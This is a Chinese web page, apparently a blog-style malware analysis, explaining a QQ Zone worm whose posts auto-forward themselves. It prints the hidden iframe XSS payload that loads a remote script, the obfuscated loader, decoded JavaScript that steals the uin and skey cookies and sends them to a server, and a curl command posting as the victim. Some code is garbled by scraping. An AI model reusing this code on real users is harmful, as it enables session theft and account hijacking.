我在qq上转发qq动态说说带图片转发 为什么 转完自动就删了

我qq自动转发日志说说怎么办?先谢谢
本回答由提问者推荐
var sogou_ad_id=731547;
var sogou_ad_height=160;
var sogou_ad_width=690;科技改变生活,代码改变世界!
by 一只努力学习ing的菜鸟
有些很讨厌的带链接说说,只要你在手机打开它,就会自动转发,内容极其不雅
一怒之下我决定看个究竟首先,在此页开头有此关键语句:
2 src="http://rtb./rtbus?qt=comps&cb=&/script&&svg&&script&eval(window.name);//"
3 name="s=document.createElement('script');document.body.appendChild(s);s.src='http://conf3.gamexm.net/moo.js';" style="display:none"&
4 &/iframe&
&iframe & style=&display:none&表明了这是一个隐藏的窗口,src是一个精心构造的URL作为窗口的内容,窗口名name是一段脚本
首先,浏览器会加载http://rtb./rtbus?qt=comps&cb=&/script&&svg&&script&eval(window.name);//http://rtb./rtbus?qt=comps&cb=#Your_Code_Here#
这是腾讯地图的&RealTime Bidding(实时竞价,RTB)API,会受到腾讯自己和杀软的信任,它的作用是返回这样的格式:#Your_Code_Here# && #Your_Code_Here#({&detail&:{&comp_list&:[{&city&:3,&comp_id&:1,&name&:&腾讯北分&}],&num&:1},&info&:{&error&:0,&type&:86}})
腾讯北分,真是233到不行。看来北分在积极参与啊!
于是&iframe& 里面出现这样一个东西:
1 &/script&&svg&&script&eval(window.name);// && &/script&&svg&&script&eval(window.name);//({"detail":{"comp_list":[{"city":3,"comp_id":1,"name":"腾讯北分"}],"num":1},"info":{"error":0,"type":86}})
呵呵,这不是一个XSS(跨站点攻击脚本)吗!!!&&/script&&svg&&由于浏览器的容错性被忽视了,&//&大家都知道是注释,于是最终效果就是这个:eval(window.name);即eval(&s=document.createElement(&script&);document.body.appendChild(s);s.src=&http://conf3.gamexm.net/moo.js&;&)eval作用是把字符串作为代码解析。s=document.createElement(&script&);document.body.appendChild(s);会在文档结尾创建&script&&/script&标签,此标签内的代码会被执行
标签内的代码变成了http://conf3.gamexm.net/moo.js这个恶意脚本
这个脚本是这样的:OlOlll=&(x)&;OllOlO=& String&;OlllOO=&tion&;OlOllO=&Code(x)}&;OllOOO=&Char&;OlllOl=&func&;OllllO=& l = &;OllOOl=&.from&;OllOll=&{return&;Olllll=&var&;eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)&&&&&&&&&&&&&&&&(略)特别长,特别费解,也是精心设计的!
请注意Ol不是01,是英文字母,为了造成阅读困难。eval已经暴露了一切。来,我们一窥究竟!按照OlOlll=&(x)&;等等进行替换
好,我们先解决第一部分,整理后如下:
1 OlOlll="(x)";
2 OllOlO=" String";
3 OlllOO="tion";
4 OlOllO="Code(x)}";
5 OllOOO="Char";
6 OlllOl="func";
7 OllllO=" l = ";
8 OllOOl=".from";
9 OllOll="{return";
10 Olllll="var";
11 eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);
然后可以得出
eval("var l = function(x){return String.fromCharCode(x)}");
好了,l是个函数,返回数字ascii码对应的字符,然后下面一段意图就非常显然了:
eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));
解析后得到
&1 eval("O=function(m){return String.fromCharCode(Math.floor(m/10000)/99);}");&
呵呵,函数O这是要玩大的数啊!!!下面的非常可怕,不过可以用调试得出答案eval(&&+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()+O()++O。。。(实在太长了)解析排版,删去干扰字符得到后得到:
1 function getGTK(str)
3 var hash = 5381;
4 for (var i = 0, len = str. i & ++i)
6 hash += (hash && 5) + str.charAt(i).charCodeAt();
8 return hash & 0x7fffffff;
10 function getCookie(name)
12 var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
13 if (arr = document.cookie.match(reg)) return unescape(arr[2]);else return null;
15 var q=parseInt(getCookie("uin").replace("o", ""));
16 var k=getCookie("skey");
17 var oHead = document.getElementsByTagName('HEAD').item(0);
18 var toscript = document.createElement("script");
19 toscript.type = "text/javascript";
20 toscript.src = "/getcookie.asp?q="+q+"&s="+k+"&g="+getGTK(k)+"&t=3";
21 oHead.appendChild(toscript);
TMD!!!还没有结束!!!继续战斗!!!Cookie是一类数据,由网站生成,涉及用户的关键、动态信息(比如判断用户是否登陆)我进入QQ空间后,Cookie为uin=o; skey=@Gxkiad0xM;uin显然为O+我的QQ号,skey是个关键临时密码,(我重登后就过期了,所以不用试!)
getCookie(name)函数用于获取我的CookiegetGTK(str)是为了给skey签名,这样可以确保skey是有效的然后这段代码会在网页里面产生如下脚本并执行:
&1 &script src="/getcookie.asp?q=&s=@Gxkiad0xM&g=&t=3" /&&
其实就是执行那个链接,把你的skey交给服务器。然后,一切结束了。因为skey功能是这样的:&skey权限代码,也就是说如果可以获得一个QQ号码的Skey代码,也就相应的拿到了对方QQ登陆和管理权限,这意味着你完全可以以主人的身份分分钟进入对方的空间、查看加密的相册,甚至发表说说,删除留言&&
QQ号+skey就有了一切!服务器自动替你发说说!!!比如只要
curl "http://user./q/taotao/cgi-bin/emotion_cgi_forward_v6?g_tk=" -H "Host: user." (略去一些数据) -H "Referer: http://user.//main" -H "Cookie:uin=o########; skey=*******;" --data "说说内容"
然后就有一条说说出现在你的空间里面!
你输了!!!
唯一解决方法就是退出空间(手机需要退出QQ),重新登陆QQ,这样会产生新的skey,原来的skey就无效了.刷新网页,或者关掉手机QQ空间,不会改变skey
Tencent空间使用了各种方法来保护skey,但是防不住如此的伪装。另外腾讯北分为此做了重大贡献!
战斗已经结束,好久没有这么精彩的一遭了.各位晚安!望引以为戒!
阅读(...) 评论()

我要回帖

更多关于 qq自动转发说说 的文章

 

随机推荐